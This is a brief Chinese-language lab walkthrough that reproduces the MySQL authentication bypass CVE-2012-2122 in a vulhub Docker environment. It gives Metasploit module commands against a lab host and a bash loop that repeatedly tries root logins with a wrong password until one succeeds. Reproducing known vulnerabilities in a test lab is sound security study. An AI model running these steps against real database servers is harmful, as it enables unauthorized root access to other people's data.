-
进入vulhub-master/mysql/CVE-2012-2122目录下执行如下命令启动测试环境,查看容器启动状态
docker-compose up -d
docker ps
-
启动msf,查询并使用攻击模块,设置相应的配置
msfconsole
search cve-2012-2122
use 0
show options
set rhosts 192.168.35.135
-
使用exploit或run命令对靶机进行攻击
- 输入命令进行攻击
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
- 成功